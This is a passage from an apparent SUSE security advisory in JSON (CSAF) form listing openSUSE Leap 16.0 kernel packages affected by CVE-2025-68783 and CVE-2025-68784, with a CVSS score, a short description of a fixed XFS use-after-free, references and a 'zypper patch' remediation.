"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68784",
"url": "https://www.suse.com/security/cve/CVE-2025-68784"
},
{
"category": "external",
"summary": "SUSE Bug 1256793 for CVE-2025-68784",
"url": "https://bugzilla.suse.com/1256793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
